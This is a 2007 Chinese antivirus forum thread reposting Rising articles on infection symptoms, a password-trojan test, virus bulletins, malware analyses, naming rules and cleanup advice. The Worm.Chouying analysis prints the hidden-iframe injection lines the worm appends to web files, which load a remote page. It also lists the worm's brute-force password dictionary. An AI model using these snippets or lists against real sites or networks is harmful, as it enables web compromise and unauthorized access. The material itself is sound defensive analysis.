【原创】病毒有关话题 bbs.ikaka.com

jlz10 - 2007-3-31 17:43:00

反病毒小知识:如何快速准确判断你的电脑是否中毒
经常死机：病毒打开了许多文件或占用了大量内存；不稳定（如内存质量差，硬件超频性能差等）；运行了大容量的软件占用了大量的内存和磁盘空间；使用了一些测试软件（有许多BUG）；硬盘空间不够等等；运行网络上的软件时经常死机也许是由于网络速度太慢，所运行的程序太大，或者自己的工作站硬件配置太低。

　　系统无法启动：病毒修改了硬盘的引导信息，或删除了某些启动文件。如引导型病毒引导文件损坏；硬盘损坏或参数设置不正确；系统文件人为地误删除等。

　　文件打不开：病毒修改了文件格式；病毒修改了文件链接位置。文件损坏；硬盘损坏；文件快捷方式对应的链接位置发生了变化；原来编辑文件的软件删除了；如果是在局域网中多表现为服务器中文件存放位置发生了变化，而工作站没有及时涮新服器的内容（长时间打开了资源管理器）。

　　经常报告内存不够：病毒非法占用了大量内存；打开了大量的软件；运行了需内存资源的软件；系统配置不正确；内存本就不够（目前基本内存要求为128M）等。

　　提示硬盘空间不够：病毒复制了大量的病毒文件（这个遇到过好几例，有时好端端的近10G硬盘安装了一个WIN98或WINNT4.0系统就说没空间了，一安装软件就提示硬盘空间不够。硬盘每个分区容量太小；安装了大量的大容量软件；所有软件都集中安装在一个分区之中；硬盘本身就小；如果是在局域网中系统管理员为每个用户设置了工作站用户的“私人盘”使用空间限制，因查看的是整个网络盘的大小，其实“私人盘”上容量已用完了。

　　软盘等设备未访问时出读写信号：病毒感染；软盘取走了还在打开曾经在软盘中打开过的文件。

　　出现大量来历不明的文件：病毒复制文件；可能是一些软件安装中产生的临时文件；也或许是一些软件的配置信息及运行记录。

　　启动黑屏：病毒感染（记得最深的是98年的4.26，我为CIH付出了好几千元的代价，那天我第一次开机到了Windows画面就死机了，第二次再开机就什么也没有了）；显示器故障；显示卡故障；主板故障；超频过度；CPU损坏等等

　　数据丢失：病毒删除了文件；硬盘扇区损坏；因恢复文件而覆盖原文件；如果是在网络上的文件，也可能是由于其它用户误删除了。

　　键盘或鼠标无端地锁死：病毒作怪，特别要留意“木马”；键盘或鼠标损坏；主板上键盘或鼠标接口损坏；运行了某个键盘或鼠标锁定程序，所运行的程序太大，长时间系统很忙，表现出按键盘或鼠标不起作用。

　　系统运行速度慢：病毒占用了内存和CPU资源，在后台运行了大量非法操作；硬件配置低；打开的程序太多或太大；系统配置不正确；如果是运行网络上的程序时多数是由于你的机器配置太低造成，也有可能是此时网路上正忙，有许多用户同时打开一个程序；还有一种可能就是你的硬盘空间不够用来运行程序时作临时交换数据用。

　　系统自动执行操作：病毒在后台执行非法操作；用户在注册表或启动组中设置了有关程序的自动运行；某些软件安装或升级后需自动重启系统。

　　有了病毒的一些基本知识后现在我们就可以来检查你的电脑中是否含有病毒现在病毒种类是越来越多，隐蔽的手段也越来越高明，所以给查杀病毒带来了新的难度。但随着计算机程序开发语言的技术性提高、计算机网络越来越普及，病毒的开发和传播是越来越容易了，因而安装反病毒软件是非常有必要的事。

jlz10 - 2007-3-31 17:48:00

暴力测试看效果：谁家杀毒软件可防止QQ密码被盗(1)
国内杀毒软件的测试环境　　
国内三家杀毒软件都在年底推出了自己的2006版新品，并且都说自己能够查杀木马，有隐私保护功能保证密码不会被盗。到底这几家的密码防盗如何，让我们进行个暴力测试看看实际效果。

既然是暴力测试，就一定得找个真家伙，我用的是一个盗QQ的木马。他运行以后会记录用户的QQ密码，然后把信息加密保存在系统目录下面（文件名为recinfo.dll），然后再通过邮件发出去。

测试环境：Athlon 64 3000+、1GB内存、Win2000 SP4中文版、裸机测试

为了测试公平，每测试完一个软件都用Ghost重新恢复系统，并且不开启杀毒软件的监控，只使用隐私保护功能。

没有安装任何的杀毒软件和防火墙进行测试，为了防止密码被发送出去，测试过程中先拔掉了网线。

运行木马，然后打开QQ，输入号码和密码。木马会记录密码，然后在system32目录下生成“recinfo.dll”。

　　

文件可以用记事本打开，里面记录的应该就是QQ号码和密码的信息了。　　

一旦连通网络以后，这个文件的内容会自动通过邮件发出去，并且会删除这个文件。

　　

jlz10 - 2007-3-31 17:50:00

暴力测试看效果：谁家杀毒软件可防止QQ密码被盗(2)
瑞星2006木马墙成功拦截

　瑞星2006　　

　瑞星今年产品的主打卖点之一是“木马墙”密码防盗，在测试中确实发现他和其他的杀毒软件不太一样。这个功能在个人防火墙2006中，所以测试的时候没有安装它的杀毒软件。它不需要事先把密码什么的录入进去，在防火墙的游戏保护里把QQ加进去就OK了。

　然后运行病毒程序再启动QQ，瑞星个人防火墙立即提示检测到QQ正在运行。

　退出QQ后，在System32目录下也没有生成记录密码的文件。

　

　同时，瑞星的防火墙提示有进程访问QQ，点击详情以后可以看到是哪些程序要访问QQ的进程。

　其中Sysapis.dll文件就是病毒释放的。　　

　感觉瑞星06的木马墙防盗功能确实不错，要是说明书写得再清楚点就好了，我琢磨了半天才知道木马墙原来在游戏保护里面...

一起评测的其他两家软件：一个一声不吭默默被虐，一个象哑巴一样不能报警。密码都没有被保护住。

　整个测试完毕，感觉瑞星2006确实是下功夫了，木马墙效果确实不错，防火墙比以前强大了不少，杀毒软件也不像05那么占内存了。

jlz10 - 2007-3-31 17:51:00

瑞星公司04月01日发布每日计算机病毒及木马播报
据瑞星全球反病毒监测网介绍，今日有一个病毒特别值得注意，它是：“威金蠕虫变种QP（Worm.Viking.qp）”病毒。该病毒集文件型病毒、蠕虫病毒、病毒下载器于一身，传播能力非常强。该病毒会破坏用户的一些软件，造成它们无法使用。

本日热门病毒：

　　“威金蠕虫变种QP（Worm.Viking.qp）”病毒：警惕程度★★★☆，蠕虫病毒，通过感染文件、局域网以及其它病毒下载传播，依赖系统：WIN9X/NT/2000/XP。

　　它会感染Windows可执行文件，并会查找局域网中的所有共享计算机，尝试猜解它们的密码，试图感染这些计算机。该病毒还会自动在后台下载并运行“QQ通行证”等其它病毒，窃取用户QQ及网络游戏的账号和密码并发送给黑客。由于该病毒在编写上存在一些问题，可造成一些用户的软件被破坏，无法使用。目前，不少杀毒软件仅能对染毒文件进行删除处理，造成用户的文件丢失。瑞星杀毒软件2007版可以清除掉染毒文件中的病毒，并将这些文件恢复成正常状态。

　　反病毒专家建议电脑用户采取以下措施预防该病毒：1、建立良好的安全习惯，不打开可疑邮件和可疑网站；2、很多病毒利用漏洞传播，一定要及时给系统打补丁；3、安装专业的防毒软件升级到最新版本，并打开实时监控程序；4、安装带有“木马墙”功能的个人防火墙软件，防止密码丢失。5、登陆http://tool.ikaka.com下载并安装免费的瑞星卡卡3.2，并开启“IE防漏墙”功能，防止病毒通过IE漏洞侵入计算机。

　　如遇病毒，请拨打反病毒急救电话：010-82678800。能够上网的用户可以访问瑞星反病毒资讯网：http://www.rising.com.cn或登录http://help.rising.com.cn使用在线专家门诊进行免费咨询。

jlz10 - 2007-3-31 17:52:00

“MSN 照片”病毒疯狂传播已经有数百台电脑中招
【快讯】3月27日，瑞星截获一个通过MSN软件传播的后门病毒，并命名为“MSN照片（Worm.IRC.MyPhoto.a）”。瑞星反病毒专家介绍说，感染该病毒之后，中毒电脑会自动向MSN好友发送英文消息，并试图传送名为“photo album.zip”的压缩文件，用户打开压缩包中的文件后就会中毒。

该病毒利用MSN向外发送病毒文件，大量消耗系统资源和网络带宽，因此对个人电脑还是企业局域网都有很大影响。同时它还会在中毒电脑里开置后门，窃取个人资料，从而使用户面临更多的安全威胁。目前已有数百用户向瑞星求助，瑞星客户服务中心的专家认为，该病毒的传播速度会继续增快，感染用户数可能会呈几何级数增长。

据瑞星反病毒专家介绍，此病毒与两年前肆虐一时的“MSN性感烤鸡”病毒极其相似。由于MSN软件相对安全，使得很多用户对于MSN类病毒缺乏警惕，这也使得“MSN照片”、“性感烤鸡”等病毒传播速度快、感染范围广。

瑞星技术部门对该病毒的分析表明，中毒用户会向MSN好友发送“Hey wanna see my new photo album?（嘿，想看看我的新照片集吗？）”、“hey you got a photo album? anyways heres my new photo album :) accept k?（嘿，收到我的新照片没有？这是我的新照片，收一下！）”等英文消息，并会传送“photo album.zip”压缩文件。如果用户接收并运行该文件，就会中毒。

瑞星反病毒专家提醒广大网民，针对“MSN照片”病毒，用户应采取如下措施：不要轻易通过MSN接收和运行陌生文件；尽快更新自己的杀毒软件版本，瑞星杀毒软件19.16.12版本可以彻底清除此病毒。

jlz10 - 2007-3-31 17:53:00

瑞星最新病毒分析报告："Win32.Miser.a(吝啬鬼)"
病毒运行后有以下行为：

1. 病毒在C:\ Program Files\Internet Explorer\目录下生成两个文件，文件名为IEXPL0RE.EXE和WebTime.exe，并把文件属性设置为隐藏。这两个文件均为病毒，病毒名分别为”Trojan.Mnless.fz”、”Trojan.DL.Agent.gys”

2. 添加注册表项以下键值，以达到其自启动的目的：
HKEY_LOCAL_MACHINE \SOFTWARE\\Microsoft\Windows\CurrentVersion\Run
数据项名：”IgfxTray”
数据值为” C:\Program Files\Internet Explorer\IEXPL0RE.EXE”

3. 将WebTime.exe注册为服务程序，使其可以每次开机时运行。

4. 感染D、 E、 F、 G、 H、 I、盘下扩展名为”.EXE”的文件，并在被感染目录下生成desktop.ini文件作为该目录已经感染的标记，desktop.ini文件中记录病毒感染的时间。被感染文件图标被改为斗地主游戏主程序的图标，如图：

5. 关闭包含以下字符串的窗口：
“internet explorer”、“收藏”、“主页”、“服务器正在”、“错误”、“.wmf”、“安全”、“rror”、“内存”、“.bat”、“.com”、“.exe”

6. 每隔30s删除IE的Cookies文件。

7. 使用IE打开”http://219.232.224.126/ind2.htm”网页。

8. 显示QQ新斗地主刷分王V2008对话框，以迷惑用户，让用户以为这是一个正常软件。

jlz10 - 2007-3-31 17:54:00

瑞星最新病毒分析报告：“Worm.Chouying（仇英）”

病毒使用Delphi编写，Upack压缩。运行后将在%SYSTEM%目录下复制一份病毒本体文件，文件名为” Lying.exe”。病毒主程序(.exe)文件的主要功能是释放病毒动态库文件”Lying.dll”，并且该动态加载运行。病毒的主要功能代码都集中在这个动态库文件中。

该病毒的主要行为：

一、将病毒动态库文件”Lying.dll”加载到explorer.exe,services.exe,winlogon.exe三个进程中。

二、感染文件扩展名为".EXE"、".SCR"、".PIF"、".COM"、".BAT"的PE文件，感染的方式是将被感染文件作为文件的附加数据添加在病毒文件的尾部，将修改感染文件的图标资源使其图标与被感染文件一致。

三、修改文件扩展名为".HTM"、".HTML"、".ASP"、".ASPX"、".ASA"、".CDX"、".CER"、".PHP"、".JSP"、".INC"的文件，在文件尾部添加以下内容：
<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;" frameborder="0"></iframe>
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

四、修改文件扩展名为".JS"的文件，在文件尾部添加以下内容：
document.write(',27h,'<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;" frameborder="0"></iframe>);
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

五、修改文件扩展名为" .CSS"的文件，在文件尾部添加以下内容：
body {background-image: url(javascript:document.write("<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;"frameborder="0"></iframe>"))}
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

六、通过局域网共享目录进行传播，并且其具有猜测计算机的弱口令的功能，
病毒会猜测以下用户的口令：“Administrator”、“admin”、“Root”。
使用的密码字典为："root"、"Password"、"1234"、"12345"、"123456"、"1234567"、
"12345678"、"123456789"、"123321"、"654321"、"54321"、"4321"、"111111"、
"121212"、"123123"、"1234qwer"、"123abc"、"000000"、"00000000"、
"11111111"、"88888888"、"88888"、"pass"、"passwd"、"database"、
"abcd"、"abc123"、"oracle"、"sybase"、"123qwe"、"server"、
"computer"、"internet"、"super"、"123asd"、"ihavenopass"、
"godblessyou"、"enable"、"2004"、"2005"、"2006"、"2007"、
"2008"、"test123"、"admin123"、"wangba"、"user"、"users"、
"abcd123"、"asdf"、"asdf123"、"windows"、"windows2000"、
"windowsxp"、"windows2003"、"window"、"love"、"iloveyou"、
"loveyou"、"test"、"temp"、"hao123"、"adsl"、"kaonima"、
"happy"、"login"、"home"、"mylove"、"guest"、"data"、"date"、
"mypass"、"mypass123"、"fuck"、"cctv"、"live"、"zxcv"、"fuckyou"、
"999999"、"foobar"、"china"、"japan"、"temp123"、"yxcv"、
"guest123"、"guest321"、"5201314"、"5021314"、"ghost"、
"goodbye"、"byebye"、"520520"。

七、下载http://www.0x145b.com/Lying.ini这个文件，然后根据文件内容再下载其中的文件到本地计算机运行。

与”熊猫烧香”病毒的异同

与”熊猫烧香”病毒的相同点为：
1) 病毒的目的以及其作用相同，都是为了经济利益协助传播其他病毒；

2) 病毒的传播方式相同，同样是通过感染可执行文件、包含漏洞的网页、网络共享目录进行传播；

与”熊猫烧香”病毒的相同点为：
1) 感染文件的手段更隐蔽，”熊猫烧香”病毒感染文件后有很明显的现象，即：被感染的文件的图标都变成了病毒的图标；“仇英”病毒感染文件后被感染的文件从外表上看不出什么变化。

2) 修改的网页文件类型有所增加，加大了清除的难度。

3) 病毒的执行形态有所变化，病毒的主要功能包含在病毒的动态库文件中，并且该动态库文件被加载系统进程当中，使得病毒的感染、传播、下载其他病毒的行为可以持续进行。

“仇英”病毒的传播情况，及发展趋势
目前“仇英”病毒处于刚刚开始流传的阶段，并没开始大面积的传播，病毒传播的网址” http://www.0x145b.com”是虚假的，但是如果病毒的源代码被广泛流传，并且被不法分子利用，那么很可能又会造成与”熊猫烧香”病毒一样的后果。

“熊猫烧香”病毒变种传播情况
到目前为止瑞星公司已经截获了107个”熊猫烧香”病毒的变种。

jlz10 - 2007-3-31 17:55:00

计算机通用病毒定义及命名规范详解

　　病毒名是由以下6字段组成的：主行为类型.子行为类型.宿主文件类型.主名称.版本信息.主名称变种号#附属名称.附属名称变种号.病毒长度。其中字段之间使用“.”分隔，#号以后属于内部信息，为推举结构。

主行为类型与病毒子行为类型

　　病毒可能包含多个主行为类型，这种情况可以通过每种主行为类型的危害级别确定危害级别最高的作为病毒的主行为类型。同样的，病毒也可能包含多个子行为类型，这种情况可以通过每种主行为类型的危害级别确定危害级别最高的作为病毒的子行为类型。其中危害级别是指对病毒所在计算机的危害。

　　病毒主行为类型有是否显示的属性，用于生成病毒名时隐藏主行为名称。它与病毒子行为类型存在对应关系，见下表：

主行为类型子行为类型
Backdoor
危害级别：1
说明：
中文名称—“后门”，是指在用户不知道也不允许的情况下，在被感染的系统上以隐蔽的方式运行可以对被感染的系统进行远程控制，而且用户无法通过正常的方法禁止其运行。“后门”其实是木马的一种特例，它们之间的区别在于“后门”可以对被感染的系统进行远程控制（如：文件管理、进程控制等）。

Worm
危害级别：2
说明：
中文名称—“蠕虫”，是指利用系统的漏洞、外发邮件、共享目录、可传输文件的软件（如：MSN、OICQ、IRC等）、可移动存储介质（如：U盘、软盘），这些方式传播自己的病毒。这种类型的病毒其子型行为类型用于表示病毒所使用的传播方式。
Mail
危害级别：1
说明：通过邮件传播

IM
危害级别：2
说明：通过某个不明确的载体或多个明确的载体传播自己

MSN
危害级别：3
说明：通过MSN传播

QQ
危害级别：4
说明：通过OICQ传播

ICQ
危害级别：5
说明：通过ICQ传播

P2P
危害级别：6
说明：通过P2P软件传播

IRC
危害级别：7
说明：通过ICR传播

说明：不依赖其他软件进行传播的传播方式，如：利用系统漏洞、共享目录、可移动存储介质。

Trojan
危害级别：3
说明：
中文名称—“木马”，是指在用户不知道也不允许的情况下，在被感染的系统上以隐蔽的方式运行，而且用户无法通过正常的方法禁止其运行。这种病毒通常都有利益目的，它的利益目的也就是这种病毒的子行为。
Spy
危害级别：1
说明：窃取用户信息（如：文件等）

PSW
危害级别：2
说明：具有窃取密码的行为

DL
危害级别：3
说明：下载病毒并运行
一、判定条款:
没有可调出的任何界面,逻辑功能为:从某网站上下载文件加载或运行.
二、逻辑条件引发的事件:
事件1、.不能正常下载或下载的文件不能判定为病毒。
操作准则:该文件不能符合正常软件功能组件标识条款的,确定为:Trojan.DL
事件2.下载的文件是病毒
操作准则: 下载的文件是病毒,确定为: Trojan.DL

IMMSG
危害级别：4
说明：通过某个不明确的载体或多个明确的载体传播即时消息（这一行为与蠕虫的传播行为不同，蠕虫是传播病毒自己，木马仅仅是传播消息）

MSNMSG
危害级别：5
说明：通过MSN传播即时消息

QQMSG
危害级别：6
说明：通过OICQ传播即时消息

ICQMSG
危害级别：7
说明：通过ICQ传播即时消息

UCMSG
危害级别：8
说明：通过UC传播即时消息

Proxy
危害级别：9
说明：将被感染的计算机作为代理服务器

Clicker
危害级别：10
说明：点击指定的网页
判定条款:
没有可调出的任何界面,逻辑功能为:点击某网页。
操作准则:
该文件不符合正常软件功能组件标识条款的,确定为:Trojan.Clicker。
(该文件符合正常软件功能组件标识条款,就参考流氓软件判定规则进行流氓软件判定)

Dialer
危害级别：12
说明：通过拨号来骗取Money的程序

说明：无法描述其利益目的但又符合木马病毒的基本特征，则不用具体的子行为进行描述

AOL
按照原来病毒名命名保留。

Notifier
按照原来病毒名命名保留。

Virus
危害级别：4
说明：中文名称—“感染型病毒”，是指将病毒代码附加到被感染的宿主文件（如：PE文件、DOS下的COM文件、VBS文件、具有可运行宏的文件）中，使病毒代码在被感染宿主文件运行时取得运行权的病毒。

Harm
危害级别：5
说明：中文名称—“破坏性程序”，是指那些不会传播也不感染，运行后直接破坏本地计算机（如：格式化硬盘、大量删除文件等）导致本地计算机无法正常使用的程序。

Dropper
危害级别：6
说明：中文名称—“释放病毒的程序”，是指不属于正常的安装或自解压程序，并且运行后释放病毒并将它们运行。
一．Dropper判定条款:
没有可调出的任何界面，逻辑功能为:自释放文件加载或运行。

二．逻辑条件引发的事件:
事件1：.释放的文件不是病毒。
操作准则: 释放的文件和释放者本身没逻辑关系并该文件不符合正常软件功能组件标识条款的,确定为:Droper
事件2：释放的文件是病毒。
操作准则: 释放的文件是病毒，确定该文件为:Droper

Hack
危害级别：无
说明：中文名称—“黑客工具”，是指可以在本地计算机通过网络攻击其他计算机的工具。
Exploit
说明：漏洞探测攻击工具

DDoser
说明：拒绝服务攻击工具

Flooder
说明：洪水攻击工具

说明：不能明确攻击方式并与黑客相关的软件，则不用具体的子行为进行描述

Spam
说明：垃圾邮件。

Nuker

Sniffer

Spoofer

Anti
说明：免杀的黑客工具

Binder
危害级别：无
说明：捆绑病毒的工具

　　正常软件功能组件标识条款：被检查的文件体内有以下信息能标识出该文件是正常软件的功能组件：文件版本信息,软件信息（注册表键值、安装目录）等。

宿主文件

　　宿主文件是指病毒所使用的文件类型，有是否显示的属性。目前的宿主文件有以下几种。　

JS 说明：JavaScript脚本文件
VBS 说明：VBScript脚本文件
HTML 说明：HTML文件
Java 说明：Java的Class文件
COM 说明：Dos下的Com文件
EXE 说明：Dos下的Exe文件
Boot 说明：硬盘或软盘引导区
Word 说明：MS公司的Word文件
Excel 说明：MS公司的Excel文件
PE 说明：PE文件
WinREG 说明：注册表文件
Ruby 说明：一种脚本
Python 说明：一种脚本
BAT 说明：BAT脚本文件
IRC 说明：IRC脚本

主名称

　　病毒的主名称是由分析员根据病毒体的特征字符串、特定行为或者所使用的编译平台来定的，如果无法确定则可以用字符串”Agent”来代替主名称，小于10k大小的文件可以命名为“Samll”。

版本信息

　　版本信息只允许为数字，对于版本信息不明确的不加版本信息。

主名称变种号

　　如果病毒的主行为类型、行为类型、宿主文件类型、主名称均相同，则认为是同一家族的病毒，这时需要变种号来区分不同的病毒记录。如果一位版本号不够用则最多可以扩展3位，并且都均为小写字母a—z，如：aa、ab、aaa、aab以此类推。由系统自动计算，不需要人工输入或选择。

附属名称

　　病毒所使用的有辅助功能的可运行的文件，通常也作为病毒添加到病毒库中，这种类型的病毒记录需要附属名称来与病毒主体的病毒记录进行区分。附属名称目前有以下几种：

Client 说明：后门程序的控制端
KEY_HOOK 说明：用于挂接键盘的模块
API_HOOK 说明：用于挂接API的模块
Install 说明：用于安装病毒的模块
Dll 说明：文件为动态库，并且包含多种功能
（空）说明：没有附属名称，这条记录是病毒主体记录

附属名称变种号

　　如果病毒的主行为类型、行为类型、宿主文件类型、主名称、主名称变种号、附属名称均相同，则认为是同一家族的病毒，这时需要变种号来区分不同的病毒记录。变种号为不写字母a—z，如果一位版本号不够用则最多可以扩展3位，如：aa、ab、aaa、aab以此类推。由系统自动计算，不需要人工输入或选择。

病毒长度

　　病毒长度字段只用于主行为类型为感染型（Virus）的病毒，字段的值为数字。字段值为0，表示病毒长度可变。

jlz10 - 2007-3-31 17:56:00

病毒疫情等级描述

病毒疫情等级用四种颜色表示，分别为：绿色、黄色、橙色和红色。四种颜色中绿色级别最低，红色为最高，它们的具体含义如下：

正常绿色：目前网络较安全，用户只需要进行日常的杀毒软件升级，并打开杀毒软件的实时监控功能即可。
警惕黄色：目前网络中存在一定数量的病毒，用户需要实时地升级杀毒软件进行防范，并打开杀毒软件的实时监控功能。
危险橙色：目前网络中病毒情况较为严重，用户需要实时升级杀毒软件并打开杀毒软件的实时监控功能进行防范，并使用杀毒软件进行全盘扫描。
高危红色：目前网络中病毒情况为高度危险，用户不仅需要实时升级杀毒软件并打开杀毒软件的实时监控功能、使用杀毒软件进行全盘扫描，还应时刻关注杀毒软件厂商发布的安全信息，做好防卫工作。

jlz10 - 2007-3-31 17:56:00

计算机病毒怎样入侵你的计算机

一般计算机病毒的入侵都是有一定的规律性的，计算机病毒常用以下几种方式入侵我们的计算机：

利用操作系统漏洞传播病毒利用操作系统存在的安全漏洞来进行攻击你的计算机，比如冲击波，震荡波。例如您的计算机感染冲击波病毒后，计算机就会弹出一个对话框，提示“您的计算机将在 1分钟内关闭”，然后便开始 1分钟倒计时，计时完毕后您的计算机就会自动关闭。
通过电子邮件传播病毒通过电子邮件传播病毒也是比较常见的一种病毒传播方式。通常会有邮件会以提示中奖，免费下载等诱人消息提示的方式诱骗用户打开邮件附件或带有病毒的网站，以达到使病毒入侵计算机的目的。最常见的就是病毒发送大量垃圾邮件，造成企业邮件服务器瘫痪，网速减慢。有些病毒还会删除系统文件，篡改系统注册表，导致计算机不能正常工作。
通过网站下载传播病毒通常会有一些提供音乐，视频等点击率较高的网站，或提供色情，反动宣传资料下载等不健康网站中被病毒传播者们利用，利用这些点击率较高的网页来达到更好的病毒传播目的。

通过即时通讯工具传播病毒
有很多木马病毒，较为常见的如：“ QQ尾巴”病毒都是通过OICQ来传播的。常见的就是当你感染病毒后，在你用OICQ， ICQ，MSN等工具给对方发送一条信息的时候，系统会自动的给对方发送一条有病毒潜伏的网页地址，或发送一个文件。而你却看不到这条信息，对方点击此链接地址，或打开运行此文件时，很可能就会被感染。
通过感染文件传播 CIH 、Funlove等病毒都是通过感染Windows可执行文件（PE格式文件）进行传播，通常被这类病毒感染的系统运行会比较缓慢，并且一些大的自解压缩文件也可能被这种病毒破坏而无法打开。
通过其他方式进行感染如通过引导区、移动存储设备等进行传播。

jlz10 - 2007-3-31 17:57:00

如何干净地清除病毒?

1 、在安全模式或纯DOS模式下清除病毒
　　当计算机感染病毒的时候，绝大多数的感染病毒的处理可以在正常模式下彻底清除病毒，这里说的正常模式准确的说法应该是实模式（Real Mode），这里通俗点说了。其包括正常模式的 Windows 和正常模式的 Windows 下的 "MS-DOS 方式 " 或 " 命令提示符 " 。但有些病毒由于使用了更加隐匿和狡猾的手段往往会对杀毒软件进行攻击甚至是删除系统中的杀毒软件的做法，针对这样的病毒绝大多数的杀毒软件都被设计为在安全模式可安装、使用、执行杀毒处理。　
　　在安全模式（Safe Mode）或者纯DOS下进行清除清除时，对于现在大多数流行的病毒，如蠕虫病毒、木马程序和网页代码病毒等，都可以在安全模式下彻底清除的，不必要像以前那样必须要用软盘启动杀毒；但对于一些引导区病毒和感染可执行文件的病毒才需要在纯 DOS下杀毒（建议用干净软盘启动杀毒）。而且，当计算机原来就感染了病毒，那就更需要在安装反病毒软件后（升级到最新的病毒库），在安全模式（Safe Mode）或者纯DOS下清除一遍病毒了！
2 、带毒文件在\Temporary Internet Files目录下
　　由于这个目录下的文件，Windows 会对此有一定的保护作用，所以对这个目录下的带毒文件即使在安全模式下也不能进行清除，对于这种情况，请先关闭其他一些程序软件，然后打开 IE ，选择IE工具栏中的 " 工具"\"Internet 选项 "，选择 " 删除文件 " 删除即可，如果有提示" 删除所有脱机内容 "，也请选上一并删除。
3 、带毒文件在 \_Restore 目录下，*.cpy 文件中
　　这是系统还原存放还原文件的目录，只有在装了Windows Me/XP 操作系统上才会有这个目录，由于系统对这个目录有保护作用。
　　对于这种情况需要先取消" 系统还原 " 功能，然后将带毒文件删除，甚至将整个目录删除也是可以的。
4 、带毒文件在.rar 、.zip 、.cab 等压缩文件中
　　对于绝大多数的反病毒软件来说，现在的查杀压缩文件中病毒的功能已经基本完善了，单是对于一些特殊类型的压缩文件或者加了密码保护的压缩文件就可能直接清除了。
　　要清除压缩文件中的病毒，建议解压缩后清除，或者借助压缩工具软件的外挂杀毒程序的功能，对带毒的压缩文件进行杀毒。
5 、病毒在引导区或者SUHDLOG.DAT或SUHDLOG.BAK文件中
　　这种病毒一般是引导区病毒，报告的病毒名称一般带有 boot 、 wyx 等字样。如果病毒只是存在于移动存储设备（如软盘、闪存盘、移动硬盘）上，就可以借助本地硬盘上的反病毒软件直接进行查杀；
　　如果这种病毒是在硬盘上，则需要用干净的可引导盘启动进行查杀。对于这类病毒建议用干净软盘启动进行查杀，不过在查杀之前一定要备份原来的引导区，特别是原来装有别的操作系统的情况，如日文Windows 、Linux 等。如果没有干净的可引导盘，则可使用下面的方法进行应急杀毒：
(1) 在别的计算机上做一张干净的可引导盘，此引导盘可以在Windows 95/98/ME 系统上通过 " 添加／删除程序 " 进行制作，但要注意的是，制作软盘的操作系统须和自己所使用的操作系统相同；
(2) 用这张软盘引导启动带毒的计算机，然后运行以下命令：
A:\>fdisk/mbr
A:\>sys a: c:
　　针对 NT 构架的操作系统可首先安装“管理员控制台”，安装后使用管理员控制台，然后分别执行 fixmbr （恢复主引导记录）和 fixboot （恢复启动盘上的引导区）命令对引导区及启动信息进行修复。
如果带毒的文件是在 SUHDLOG.DAT 或 SUHDLOG.BAK 文件中，那么直接删除即可。这是系统在安装的时候对硬盘引导区做的一个备份文件，一般作用不大，病毒在其中已经不起作用了。
6 、带毒文件在一些邮件文件中，如 dbx 、 eml 、 box 等
　　绝大多数的防毒软件可以直接检查这些邮件文件中的文件是否带毒，对于邮箱中的带毒的信件，可以根据用户的设置杀毒或删除带毒邮件，但是由于此类邮箱的复合文件结构，易出现杀毒后的邮箱依旧可以检测到病毒情况，这是由于没有压缩邮箱进行空间释放的原因导致的，您可以尝试在 Outlook Express 中选择“工具” — 〉“选项” — 〉“维护” — 〉“立即清除” — 〉“压缩”
7 、文件中有病毒的残留代码
　　这种情况比较多见的就是带有 CIH 、Funlove 、宏病毒（包括 Word 、 Excel 、 Powerpoint 和 Wordpro 等文档中的宏病毒）和个别网页病毒的残留代码，通常防毒软件对这些带有病毒残留代码的文件报告的病毒名称后缀通常是 int 、 app 等结尾，而且并不常见，如 W32/FunLove.app 、W32.Funlove.int 。一般情况下，这些残留的代码不会影响正常程序的运行，也不会传染，如果需要彻底清除的话，要根据各个病毒的实际情况进行清除。
8 、文件错误
　　这种情况出现的并不多，通常是由于某些病毒对系统中的关键文件修改后造成的，异常的文件无法正常使用，同时易造成别的系统错误，针对此种情况建议进行修复安装的方法恢复系统中的关键文件。
9 、加密的文件或目录
　　对于一些加密了的文件或目录，请在解密后再进行病毒查杀。
10 、共享目录杀毒
　　这里包括两种情况：本地共享目录和网络中远程共享目录（其中也包括映射盘）。　
　　遇到本地共享的目录中的带毒文件不能清除的情况，通常是局域网中别的用户在读写这些文件，杀毒的时候表现为无法直接清除这些带毒文件中的病毒，如果是有病毒在对这些目录在写病毒操作，表现为对共享目录进行清除病毒操作后，还是不断有文件被感染或者不断生成病毒文件。以上这两种情况，都建议取消共享，然后针对共享目录进行彻底查杀，恢复共享的时候，注意不要开放太高的权限，并对共享目录加设密码。对远程的共享目录（包括映射盘）查杀病毒的时候，首先要保证本地计算机的操作系统是干净的，同时对共享目录也有最高的读写权限。如果是远程计算机感染病毒的话，建议还是直接在远程计算机进行查杀病毒。
　　特别的，如果在清除别的病毒的时侯都建议取消所有的本地共享，再进行杀毒操作。在平时的使用中，也应注意共享目录的安全性，加设密码，同时，非必要的情况下，不要直接读取远程共享目录中的文件，建议拷贝到本地检查过病毒后再进行操作。
11 、光盘等一些存储介质
　　对于光盘上带有的病毒，不要试图直接清除，这是因为光盘上的文件都是只读的原因导致的。同时，对另外一些存储设备查杀病毒的，也需要注意其是否处于写保护或者密码保护状态。

jlz10 - 2007-3-31 17:58:00

如何更好地预防计算机病毒入侵

　　有病治病，无病预防这是人们对健康生活的最基本也是最重要的要求，预防比治疗更为重要。对计算机来说，同样也是如此，了解病毒，针对病毒养成一个良好的计算机应用管理习惯，对保障您的计算机不受计算机病毒侵扰是尤为重要的。为了减少病毒的侵扰，建议大家平时能做到“三打三防”。

　　 “三打” 就是安装新的计算机系统时，要注意打系统补丁，震荡波一类的恶性蠕虫病毒一般都是通过系统漏洞传播的，打好补丁就可以防止此类病毒感染；用户上网的时候要打开杀毒软件实时监控，以免病毒通过网络进入自己的电脑；玩网络游戏时要打开个人防火墙，防火墙可以隔绝病毒跟外界的联系，防止木马病毒盗窃资料。

